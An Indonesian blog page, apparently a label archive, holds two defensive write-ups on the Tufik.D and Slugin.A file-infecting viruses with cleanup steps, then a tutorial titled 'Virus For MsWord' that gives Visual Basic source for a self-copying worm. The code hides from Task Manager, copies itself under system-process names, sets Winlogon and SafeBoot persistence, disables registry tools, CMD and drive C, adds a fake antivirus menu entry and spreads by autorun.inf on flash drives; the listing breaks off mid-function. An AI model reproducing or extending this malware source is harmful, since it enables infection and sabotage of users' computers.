Tampilkan postingan dengan label Virus. Tampilkan semua postingan
Tampilkan postingan dengan label Virus. Tampilkan semua postingan

W32/Tufik.D (Win32.Tufei.13798) 0

Agung Dwi Prasetyo | 15.53.00 | ,

W32/Tufik.D (Win32.Tufei.13798)

Injeksi file .exe sampai menjadi sesuatu banget (alias virus :p)

Tren atau musiman sepertinya sudah menjadi fenomena umum bagi masyarakat Indonesia. Hal apa saja yang dianggap unik dan menarik, tidak akan membutuhkan waktu yang lama untuk menjadi heboh.

Fenomena tren atau musiman dapat terjadi pada hampir seluruh bidang. Contoh pada olahraga, sepakbola adalah tren yang bisa dianggap tidak pernah habis. Berbeda pada cabang olahraga lain yang akan heboh pada saat-saat pertandingan atau kejuaran. Beberapa tren atau musiman lain seperti misalnya distro, band indie, seni fotografi, Bike to Work, berburu kuliner, penggunaan RBT, Blackberry hingga sepeda Fixie. Bahkan pada media jejaring sosial seperti Friendster, hingga Facebook dan Twitter.

Efek ngetren atau musiman ternyata juga merambah para pembuat malware yang sedang dominan dan maraknya membuat varian virus penginfeksi file executable (aplikasi). Dalam setahun ini saja sudah banyak varian virus penginfeksi file executable yang bertebaran dan berkembang di Indonesia, sebut saja Sality, TDSS, Chir, Alman, Virut, Ramnit, dan Slugin.

Dan kini bagi anda para pengguna komputer di Indonesia, harap berhati-hati karena sejak Februari hingga saat ini banyak pengguna komputer yang sudah terinfeksi oleh serangan virus yang mampu merusak program/aplikasi anda. Dan salah satu-nya adalah varian virus yang terdeteksi dan memakan banyak korban yaitu W32/Tufik.D atau Win32.Tufei.13798. (lihat gambar 1)
Gambar 1, Norman mendeteksi virus W32/Tufik.D (Win32.Tufei.13798)

Karakteristik W32/Tufik.D (Win32.Tufei.13798)
Tufik.D (Tufei.13798) bukanlah merupakan kelompok malware baru, melainkan sudah ada sejak tahun 2008. Dengan memiliki teknik tambahan yang berbeda, Tufik.D (Tufei.13798) mampu menyebar dan berkembang setidaknya sejak Februari 2011 hingga kini masih berkeliaran dengan berbagai varian yang lain.

Tufik.D (Tufei.13798) memiliki kemampuan melakukan infeksi program/aplikasi yang mirip seperti varian malware lain yaitu Alman, Sality, Virut dan Ramnit. Hal ini yang bisa membuat para pengguna komputer khususnya programmer atau pengkoleksi software menjadi ngeri, karena akan sulit jika membersihkan virus yang melakukan infeksi file terutama file executable (aplikasi).

Tufik.D (Tufei.13798) merupakan salah satu varian virus yang melakukan infeksi file executable (application).

Selain itu jika anda terhubung ke internet, Tufik.D (Tufei.13798) akan menghubungi remote server (IRC server) dan melakukan koneksi ke beberapa alamat server zombie untuk mendownload sekumpulan malware (virus, trojan, spyware).

File W32/Tufik.D (Win32.Tufei.13798)
Berbeda dengan varian malware pada umum-nya, Tufik.D (Tufei.13798) menggunakan pendekatan yang sama seperti virus Slugin.A (Plugin.1) yaitu hanya memanfaatkan file executable (aplikasi) yang telah terinfeksi untuk melakukan penyebaran.

Karena tidak membuat file utama, Tufik.D (Tufei.13798) menggunakan pendekatan infeksi pada system Windows dengan tujuan menjaga agar file executable (aplikasi) yang sudah terinfeksi virus akan berjalan dengan baik sehingga komputer akan sulit dibersihkan.

Jika anda sudah terinfeksi Tufik.D (Tufei.13798), malware akan mencoba melakukan infeksi pada beberapa file Windows yang berjalan dan berusaha mengganti-nya yaitu pada :
  • C:\WINDOWS\explorer.exe (1,029 KB)

Untuk melakukan hal tersebut, Tufik.D (Tufei.13798) akan membuat file duplikasi dari Explorer.exe pada root drive yaitu :
  • C:\explorer.exe (1,043 kb)

Selanjutnya file tersebut akan di-infeksi dan menggantikan file explorer.exe yang asli pada folder WINDOWS setelah komputer melakukan restart.

Kemudian malware memindahkan file asli dari explorer.exe ke folder temporary :
  • C:\Documents and Settings\[UserName]\Local Settings\Temp\@1.tmp (1,029 KB)

Serta melakukan perubahan pada file berikut :
  • C:\WINDOWS\debug\usermode\userenv.log
Sedangkan sasaran infeksi yaitu file yang memiliki ekstension berikut :
  • .exe (pada seluruh drive) sebesar 14 kb

Secara umum baik pada file sysetm Windows ataupun file aplikasi /executable, Tufik.D (Tufei.13798) akan menginfeksi dengan menambah ukuran file sebesar 14 kb.

Gejala & Efek W32/Tufik.D (Win32.Tufei.13798)
Beberapa gejala yang terjadi jika anda sudah terinfeksi yaitu :

  • Menginfeksi file executable (exe)
Agar dapat dengan mudah melakukan penyebaran serta menjaga agar komputer tetap terinfeksi, maka Tufik.D (Tufei.13798) menginfeksi file executable (exe). Sehingga jika pengguna komputer tidak sengaja menjalankan file program/aplikasi yang menggunakan extension exe, Tufik.D (Tufei.13798) akan kembali menginfeksi komputer. Dengan demikian komputer akan sangat sulit dibersihkan.

  • Menginfeksi file system Windows (Explorer)
Salah satu efek yang terbilang cukup sukses adalah kemampuan Tufik.D (Tufei.13798) untuk menginfeksi file system Windows seperti Windows Explorer. Dengan menginfeksi file system yang sudah otomatis berjalan saat komputer aktif, maka proses Tufik.D (Tufei.13798) bisa dengan leluasa melakukan aksi-nya.
  • Disable Windows File Protection
    Agar dengan mudah menginfeksi Windows Explorer, Tufik.D (Tufei.13798) akan mematikan fungsi dari Windows File Protection. Dengan cara ini maka jika ada perubahan pada system Windows seperti Explorer, tidak akan muncul notifikasi bahwa file Windows telah terinfeksi. (lihat gambar 2)
    Gambar 2, Notifikasi ini tidak akan muncul jika Tufik.D (Tufei.13798) telah beraksi
  • Melakukan koneksi ke Remote Server
    Untuk memudahkan dalam melakukan aksi-nya, Tufik.D (Tufei.13798) melakukan koneksi ke remote server dengan membuka port-port tertentu seperti 80, 81, 8080 dan 8081.
  • Mendownload file malware
    Tufik.D (Tufei.13798) mencoba memanfaatkan beberapa port Windows yang terbuka agar dapat melakukan salah satu aksi-nya yaitu mendownload file malware lain agar komputer tetap terinfeksi dan melakukan penyebaran dengan mudah.
  • Mematikan services-services tertentu
Akibat dari infeksi terhadap file executable (exe) termasuk file Windows Explorer dan mematikan beberapa services tertentu, maka terkadang beberapa file Windows akan menjadi error sehingga komputer menjadi tidak berjalan dengan normal. (lihat gambar 3)
Gambar 3, Windows Explorer dibuat error karena telah di-infeksi oleh Tufik.D (Tufei.13798)

Metode Penyebaran W32/Tufik.D (Win32.Tufei.13798)
Beberapa cara dari Tufik.D (Tufei.13798) melakukan penyebaran yaitu sebagai berikut :

  • Removable drive
Dengan memanfaatkan file executable (exe) yang sudah terinfeksi oleh Tufik.D (Tufei.13798), hal ini yang secara umum sering digunakan oleh para pembuat virus infeksi seperti Sality, Virut, Alman, Ramnit, dll. Perhatikanlah bagi anda yang suka menyimpan file program/aplikasi untuk dipastikan tidak terinfeksi oleh Tufik.D (Tufei.13798).

  • Jaringan
Dengan memanfaatkan file sharing terutama sharing full akses, Tufik.D (Tufei.13798) dapat menginfeksi file executable (exe). Sehingga jika file tersebut juga di akses orang lain, maka akan dengan mudah terinfeksi dengan cepat.

Pembersihan W32/Tufik.D (Win32.Tufei.13798)
  1. Putuskan koneksi jaringan/internet.

  1. Matikan “System Restore” (Windows XP/ME)
  • Klik kanan My Computer, pilih Properties.
  • Pilih tab System Restore, beri ceklist pilihan Turn off System restore
  • Klik Apply, Klik OK. (lihat gambar 4)
    Gambar 4, Matikan System Restore
  1. Matikan dan hapus Tufik.D (Tufei.13798)
Lakukan langkah-langkah berikut :
  1. Download tools untuk membersihkan Tufik.D (Tufei.13798) pada komputer yang belum terinfeksi pada link berikut :

Norman Malware Cleaner

  1. Setelah selesai, kompress file tersebut hingga menjadi file zip.
  2. Copy file tersebut dan letakkan dimana saja pada komputer yang terinfeksi.
  3. Klik kanan file zip tersebut, kemudian klik explore.
  4. Klik 2x file yang sudah di-explore tersebut untuk menjalankan, kemudian klik Run.
  5. Jika sudah muncul jendela Dr.Web CureIt, klik OK untuk menjalankan dalam mode EPM (Enhanced Protection Mode).
  6. Klik Start untuk memulai Scan, dan klik Yes untuk memulai.
  7. Biarkan hingga proses scan selesai.

  1. Bersihkan temporary file dari jejak Tufik.D (Tufei.13798)
Lakukan langkah-langkah berikut :
  1. Klik Menu Start -> Run
  2. Ketik perintah pada kotak open : cleanmgr , kemudian klik OK.
  3. Pada drive system (C) klik OK, biarkan proses scan drive.
  4. Setelah muncul jendela Disk Cleanup, beri tanda file yang akan di hapus (terutama Temporary Files), kemudian klik OK.
  5. Tunggu hingga selesai.

  1. Untuk pembersihan yang optimal dan mencegah infeksi ulang, sebaiknya menggunakan antivirus yang ter-update dan mengenali malware ini dengan baik.
  2. Aktifkan kembali System Restore.

W32/Slugin.A (Win32.Plugin.1) 0

Agung Dwi Prasetyo | 15.35.00 | ,

W32/Slugin.A (Win32.Plugin.1)
“Aktor intelektual” dibelakang banjir SPAM dgn tautan

Kalau anda sering menerima email spam tanpa Subject yang jelas dan body email hanya berisi link / tautan saja. Kemungkinan besar anda menjadi korban pengiriman SPAM dari komputer teman anda. TETAPI, jika banyak teman mengeluhkan / bertanya kepada anda mengapa email anda mengirimkan banyak email dengan Subject yang kosong atau unknown dan body email berisi tautan saja. Anda perlu waspada, kemungkinan besar komputer anda terinfeksi oleh Virut http://www.vaksin.com/2009/0909/virut/virut.htm yang mengganas sejak tahun 2009. Di tahun 2011 ini ada satu virus yang bandelnya tidak kalah dengan Virut dan juga memiliki payload mengirimkan SPAM (lihat gambar 1) di bawah. Virus dengan nama Slugin ini memiliki kemampuan untuk menggunakan akun email dari komputer korbannya untuk mengirimkan email SPAM ke alamat-alamat email yang ditemukan dalam address book komputer korbannya. Kemungkinan besar motivasi Slugin mengirimkan SPAM adalah untuk mendapatkan keuntungan finansial karena kerap kali link tersebut di forwardkan ke situs-situs penjual obat kuat.

Gambar 1, Aksi Slugin mengirimkan email dari komputer korbannya.

Siapa tidak kenal Brazil ??? Sebagai salah satu negara kiblat sepakbola dunia, Brazil menjadi salah satu kekuatan besar sepakbola di dunia. Dengan memiliki para pemain kelas dunia yang bermain di Eropa, Brazil merupakan salah satu negara yang memiliki sumber daya manusia pemain muda yang menjadi incaran para pemandu bakat dunia.

Jika anda menyaksikan laga final liga champions antara Barcelona (Spanyol) melawan Manchester United (Inggris), terdapat sekumpulan pemain kelas dunia dari berbagai negara yang bertanding. Tidak hanya menampilkan dominasi pemain Spanyol dan Inggris, tetapi juga pemain-pemain antar benua seperti Messi dan Mascherano (Argentina),  Park Ji Sung (Korea Selatan), Valencia (Ekuador), Hernandez (Mexico), serta duo pemain Brazil yaitu Daniel Alves (Barcelona) dan Fabio (Manchester United).

Selain memiliki para pemain berbakat dalam sepakbola, Brazil ternyata juga tidak kalah berbakat dibandingkan para pembuat virus lokal dari Indonesia. Dalam rentang waktu 4 bulan sejak awal tahun 2011, terdapat salah satu virus yang berasal dari Brazil dan ternyata memiliki cara infeksi yang mirip dengan Ramnit.

Bagi anda para pengguna komputer di Indonesia, harap berhati-hati karena sejak Januari hingga saat ini banyak pengguna komputer yang sudah terinfeksi oleh serangan virus yang mampu merusak program/aplikasi anda. Dan salah satu-nya adalah varian virus yang terdeteksi dan memakan banyak korban yaitu W32/Slugin.A atau Win32.Plugin.1. (lihat gambar 2)
Gambar 2, Norman mendeteksi virus W32/Slugin.A (Win32.Plugin.1)

Karakteristik W32/Slugin.A (Win32.Plugin.1)
Slugin.A (Plugin.1) bukanlah merupakan kelompok malware baru, melainkan sudah ada sejak tahun 2008. Dengan memiliki teknik tambahan yang berbeda, Slugin.A (Plugin.1) mampu menyebar dan berkembang setidaknya dari Januari 2011 hingga kini masih berkeliaran dengan berbagai varian yang lain.

Slugin.A (Plugin.1) memiliki kemampuan melakukan infeksi program/aplikasi yang mirip seperti varian malware lain yaitu Alman, Sality, Virut dan Ramnit. Hal ini yang bisa membuat para pengguna komputer khususnya programmer atau pengkoleksi software menjadi ngeri, karena akan sulit jika membersihkan virus yang melakukan infeksi file terutama file executable (aplikasi).

Slugin.A (Plugin.1) merupakan salah satu varian virus yang melakukan infeksi file executable (application). Dan tidak hanya file executable, tetapi juga melakukan infeksi terhadap file DLL (dynamic load library).

Selain itu jika anda terhubung ke internet, Slugin.A (Plugin.1) akan menghubungi remote server (IRC server) dan melakukan koneksi ke beberapa alamat server zombie untuk mendownload sekumpulan malware (virus, trojan, spyware). Pada beberapa waktu tertentu, Slugin.A (Plugin.1) akan mematikan beberapa service tertentu dan mengirimkan spam secara acak.

File W32/Slugin.A (Win32.Plugin.1)
Berbeda dengan varian malware pada umum-nya, Slugin.A (Plugin.1) hanya memanfaatkan file executable (aplikasi) yang telah terinfeksi untuk melakukan penyebaran. Sedangkan file utama yang dibuat bertujuan untuk melindungi diri.

File utama Slugin.A (Plugin.1) dibuat menggunakan bahasa pemrograman C. File utama yang dibuat akan menjaga agar file executable (aplikasi) yang sudah terinfeksi virus akan berjalan dengan baik sehingga komputer akan sulit dibersihkan.

Jika anda sudah terinfeksi Slugin.A (Plugin.1), malware akan membuat file utama yaitu :
  • C:\Documents and Settings\[User]\Application Data\Wplugin.dll (111 kb)
  • C:\WINDOWS\wplugin.dll (111 kb)

Kemudian untuk melakukan penyebaran dengan melakukan infeksi maka malware akan membuat file lain yaitu :
  • C:\Program Files\Messenger\ws2help.dll (21 kb)
  • C:\WINDOWS\ws2help.dll (21 kb)

Selain itu Slugin.A (Plugin.1) akan mencoba melakukan infeksi pada beberapa file Windows yang berjalan dan berusaha mengganti-nya seperti pada file :
  • C:\Program Files\Messenger\msmsgs.exe.local (1 kb)
  • C:\WINDOWS\explorer.exe.local (1 kb)

Kemudian malware juga membuat file log berikut pada :
  • C:\Windows\System32\smcinst.log (0 kb)

Sedangkan sasaran infeksi yaitu file yang memiliki ekstensi berikut :
  • .exe (pada seluruh drive)
  • .dll (pada seluruh drive)

Gejala & Efek W32/Slugin.A (Win32.Plugin.1)
Beberapa gejala yang terjadi jika anda sudah terinfeksi yaitu :

ü Menginfeksi file executable (exe)
Agar dapat dengan mudah melakukan penyebaran serta menjaga agar komputer tetap terinfeksi, maka Slugin.A (Plugin.1) menginfeksi file executable (exe). Sehingga jika pengguna komputer tidak sengaja menjalankan file program/aplikasi yang menggunakan extension exe, Slugin.A (Plugin.1) akan kembali menginfeksi komputer. Dengan demikian komputer akan sangat sulit dibersihkan.

ü Menginfeksi file dll (dynamic load library)
Selain menginfeksi file executable (exe), Slugin.A (Plugin.1) juga melakukan infeksi terhadap file dll (dynamic load library) yang bertujuan untuk melindungi file terinfeksi yang sedang aktif dan melakukan penyebaran dengan menginfeksi file executable lain-nya..

ü Menginfeksi file system Windows (Explorer & Messenger)
Salah satu efek yang terbilang cukup sukses adalah kemampuan Slugin.A (Plugin.1) untuk menginfeksi file system Windows seperti Windows Explorer dan Windows Messenger. Dengan menginfeksi file system yang sudah otomatis berjalan saat komputer aktif, maka proses Slugin.A (Plugin.1) bisa dengan leluasa melakukan aksi-nya. (lihat gambar 3)
Gambar 3, Windows Explorer telah terinfeksi oleh Slugin.A (Plugin.1)

ü Melakukan koneksi ke Remote Server
Untuk memudahkan dalam melakukan aksi-nya, Slugin.A (Plugin.1) melakukan koneksi ke remote server dengan membuka port-port tertentu seperti 80, 81, 82. Remote Server ini yang dituju oleh pembuat virus Slugin.A (Plugin.1) yang berasal dari Brazil.

ü Mengirim informasi
Sebagai tanda bahwa komputer telah terinfeksi, Slugin.A (Plugin.1) melakukan koneksi ke remote server dan mengirim informasi bahwa komputer telah terinfeksi serta mengirimkan beberapa informasi lain yang diperlukan. Alamat email yang akan dituju yaitu :
û  cvmb@hotmail.com  

ü Mendownload file malware
Slugin.A (Plugin.1) membuka beberapa port agar dapat melakukan salah satu aksi-nya yaitu mendownload file malware lain agar komputer tetap terinfeksi dan melakukan penyebaran. Port yang dibuka untuk mendownload yaitu 10100.

ü Mengirim SPAM
Selain mengirim pesan dan mendownload malware, Slugin.A (Plugin.1) juga melakukan salah satu aksi-nya yaitu mengirim SPAM kepada alamat-alamat yang berada pada address book pemilik komputer. SPAM tersebut biasanya hanya berisi link-link yang tidak jelas dan tidak bisa dibuka. (lihat gambar 1 di atas)
ü Mematikan service Windows tertentu
Akibat dari infeksi terhadap file executable (exe) termasuk file Windows Explorer dan mematikan beberapa service tertentu, maka terkadang beberapa file Windows akan menjadi error sehingga komputer menjadi tidak berjalan dengan normal. (lihat gambar 4)
Gambar 4, Windows Explorer error karena telah di-infeksi oleh Slugin.A (Plugin.1)

Metode Penyebaran W32/Slugin.A (Win32.Plugin.1)
Beberapa cara dari Slugin melakukan penyebaran adalah sebagai berikut :
  • Removable drive
Dengan memanfaatkan file executable (exe) dan file dll (dynamic load library) yang sudah terinfeksi oleh Slugin.A (Plugin.1), hal ini yang secara umum sering digunakan oleh para pembuat virus infeksi seperti Sality, Virut, Alman, Ramnit, dll. Perhatikanlah bagi anda yang suka menyimpan file program/aplikasi atau dll untuk dipastikan tidak terinfeksi oleh Slugin.A (Plugin.1).
  • Jaringan
Dengan memanfaatkan file sharing terutama sharing full akses, Slugin.A (Plugin.1) dapat menginfeksi file executable (exe) dan file dll. Sehingga jika file tersebut juga di akses orang lain, maka akan dengan mudah terinfeksi dengan cepat.

Pembersihan W32/Slugin.A (Win32.Plugin.1)
1.    Putuskan koneksi jaringan/internet.
2.    Matikan “System Restore” (Windows XP/ME)
ñ  Klik kanan My Computer, pilih Properties.
ñ  Pilih tab System Restore, beri ceklist pilihan Turn off System restore
ñ  Klik Apply, Klik OK. (lihat gambar 5)
Gambar 5, Matikan System Restore

3.    Matikan dan hapus Slugin.A (Plugin.1)
Lakukan langkah-langkah berikut :
Download tools untuk membersihkan Slugin.A (Plugin.1) pada komputer yang belum terinfeksi pada link berikut :

Norman Malware Cleaner


4.    Bersihkan temporary file dari jejak Slugin.A (Plugin.1)
Lakukan langkah-langkah berikut :
a)    Klik Menu Start -> Run
b)    Ketik perintah pada kotak open : cleanmgr , kemudian klik OK.
c)    Pada drive system (C) klik OK, biarkan proses scan drive.
d)    Setelah muncul jendela Disk Cleanup, beri tanda file yang akan di hapus (terutama Temporary Files), kemudian klik OK.
e)    Tunggu hingga selesai.

5.    Untuk pembersihan yang optimal dan mencegah infeksi ulang, sebaiknya menggunakan antivirus yang ter-update dan mengenali malware ini dengan baik.

6.    Aktifkan kembali System Restore.

Virus For MsWord 0

Agung Dwi Prasetyo | 13.21.00 | , ,

Program kita kali ini adalah membuat Virus sederhana yaitu hanya mengganggu Microsoft Office Word dan Excel.Misalkan user membuka Word maka pada kertas tempat mengetik sudah muncul pesan dari Virus demikian pula jika membuka Excel maka pesan akan diberikan virus pada cell Excel. Sederhana sekali ya..ya memang virus ini tidak merusak dokumen/file-file dan tidak mengahpus file-file apapun jadi virus yang sangat baik hati..he..he..Jika anda ingin menambahkan fiture-fiture yang kejam silahkan saja tapi disini/virus ini tidak saya tuliskan bagaimana melakukan format atau delete file ataupun fiture penyusupan lainnya (sekarang belum saatnya).Silahkan dicoba dijamin 100% tidak ada data yang dihapus, ini hanya sebuah virus permainan saja kok..berani mencoba?

Yang dibutuhkan dalam pembuatan project ini adlah : 5 buah timer dan 1 drivelistbox
Pada proyek kali ini kita dapat belajar mengenai Windows Api Sendmessage, registry, dan Otomatisasi pada Word serta Excel. Semoga bermanfaat.

Masukan semua code di bawah ini pada form
==========================================
Private Declare Function FindWindow Lib “user32″ Alias “FindWindowA” (ByVal lpClassName As String, ByVal lpWindowName As String) As Long ‘pencari Kleas dan Window Name Suatu File
Private Declare Function SendMessage Lib “user32″ Alias “SendMessageA” (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long ‘sendmessage
Private Declare Function GetDriveType& Lib “Kernel32″ Alias “GetDriveTypeA” (ByVal nDrive As String) ‘ penghandel flashdisk
Private Declare Function ExitWindowsEx Lib “user32″ (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long ‘exit windows
Private Const WM_CLOSE = &H10
Private Const EWX_LOGOFF = 0
Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2
Private Const EWX_FORCE = 4
Private Const EWX_POWEROFF = 8

Option Explicit
Dim FWnd
Dim obj As Object
Dim doc As Object
Dim WrkBook As Object
Dim WrkSheet As Object
Dim i As Integer
Dim RegRun
Dim FolderStartUp
Dim FolderMyDocuments
Dim FolderTemplates
Dim FolderNetHood
Dim FolderPrintHood
Dim FolderFavorites
Dim FolderSendTo
Dim FolderPrograms
Dim FlashDisk

Private Sub Form_Load()
On Error Resume Next
‘acak caption virus shg caption akan berubah setiap windows startup atau virus tereksekusi
Randomize
Me.Caption = Int(Rnd * 2221189331445#) ‘silahkan masukan angka sesuka anda
‘menggandakan diri
GandakefolderIstimewa
Me.Visible = False
App.TaskVisible = False ‘virus tidak terlihat di task manager
InfeksiRegistry
End Sub

Sub BuatWord()
On Error Resume Next
Set obj = CreateObject(“word.application”)
Set doc = CreateObject(“word.application”)
Set doc = obj.Documents.Add
doc.Content = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”
End Sub

Sub BuatXls()
On Error Resume Next
Set obj = CreateObject(“excel.application”)
Set WrkBook = obj.workbooks.Add
Set WrkSheet = WrkBook.worksheets.Add
WrkSheet.Cells(15, 4) = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”
End Sub

Sub InfeksiRegistry()
On Error Resume Next
RegRun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell”, “Explorer.exe” & ” “”" & FolderMyDocuments & “\services.exe”"” ‘virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell”, FolderFavorites & “\SalamKenal.exe” ‘virus akan tetap berjalan pada tipe windows Safe Mode With Command Prompt
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD” ‘Folder Options tdk dapat diakses
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD” ‘Folder Options tdk dapat diakses
RegRun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”, 1, “REG_DWORD” ‘Disable CMD dan File .Bat
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”, 1, “REG_DWORD” ‘Disable CMD dan File .Bat
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”, 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”, 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”, FolderTemplates & “\smss.exe” ‘smss.exe berjalan pada saat startup
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”, FolderSendTo & “\System.exe” ‘System.exe berjalan pada saat startup
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”, 1, “REG_DWORD” ‘search pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”, 1, “REG_DWORD” ‘Ssearch pd star menu hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”, 1, “REG_DWORD” ‘help suport pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”, 1, “REG_DWORD” ‘help suport pd star menu hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”, 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”, 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\Control Panel\Colors\WindowText”, “255 0 0″, “REG_SZ” ‘DEFAULT TEKS MENJADI MERAH
RegRun.regwrite “HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\”, FolderFavorites & “\SalamKenal.exe” ‘Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan Antivirus yang dijalankan melainkan Virus SalamKenal.exe yang terletak di Folder Favorite
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”, 4, “REG_DWORD” ‘Drive C hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”, 4, “REG_DWORD” ‘Drive C hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”, 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”, 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun”, 1, “REG_DWORD” ‘Autorun pada CD atau USB
End Sub

Sub GandaKeFlashDisk()
On Error Resume Next
If Dir(FlashDisk & “\Winlogon.exe”) <> “Winlogon.exe” Then ‘mengecek ada atau tdknya winlogon.exe di flashdisk jika tdk ada kemudian
FileCopy FolderStartUp & “\Winlogon.exe”, FlashDisk & “\Winlogon.exe”
SetAttr FlashDisk & “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly
End If
BuatFileAutorunInf
End Sub

Sub BuatFileAutorunInf()
‘membuat file Autorun.inf ke flashdisk yang berfungsi agar setiap flashdisk jika di klik dua kali/klik kanan trus klik open maka Virus (winlogon.exe) akan tereksekusi
On Error Resume Next
Open FlashDisk & “\Autorun.Inf” For Output As 1
Print #1, “[AutoRun]”
Print #1, “Icon=Winlogon.exe” ‘Agar FlashDisk Memiliki Icon Sama dengan Virus
Print #1, “Open=Winlogon.exe”
Print #1, “ShellExecute=Winlogon.exe”
Print #1, “Shell\Open\Command=Winlogon.exe”
Print #1, “Shell=Open”
Close #1
SetAttr FlashDisk & “\Autorun.Inf”, vbHidden + vbSystem + vbReadOnly
End Sub

Sub GandakefolderIstimewa()
On Error Resume Next
Set RegRun = CreateObject(“WScript.Shell”)
FolderStartUp = RegRun.specialfolders(“StartUp”)
FolderMyDocuments = RegRun.specialfolders(“MyDocuments”)
FolderTemplates = RegRun.specialfolders(“Templates”)
FolderNetHood = RegRun.specialfolders(“NetHood”)
FolderPrintHood = RegRun.specialfolders(“PrintHood”)
FolderFavorites = RegRun.specialfolders(“Favorites”)
FolderSendTo = RegRun.specialfolders(“SendTo”)
FolderPrograms = RegRun.specialfolders(“Programs”)
On Error Resume Next
‘membuat virus dengan nama winlogon.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderStartUp & “\WinLogon.Exe”
SetAttr FolderStartUp & “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama services.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderMyDocuments & “\services.Exe”
SetAttr FolderMyDocuments & “\services.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama smss.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderTemplates & “\smss.Exe”
SetAttr FolderTemplates & “\smss.Exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama csrss.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderPrintHood & “\csrss.Exe”
SetAttr FolderPrintHood & “\csrss.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama Isass.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderNetHood & “\Isass.Exe”
SetAttr FolderNetHood & “\Isass.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama SalamKenal.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderFavorites & “\SalamKenal.Exe”
SetAttr FolderFavorites & “\SalamKenal.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama System.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderSendTo & “\System.Exe”
SetAttr FolderSendTo & “\System.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama ctfmon.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderPrograms & “\ctfmon.Exe”
SetAttr FolderPrograms & “\ctfmon.exe”, vbHidden + vbSystem + vbReadOnly
End Sub

Private Sub Timer1_Timer() ‘Timer 1 diberi interval 5 detik
On Error Resume Next
FWnd = FindWindow(“OpusApp”, “Document1 – Microsoft Word”) ‘Ms Word
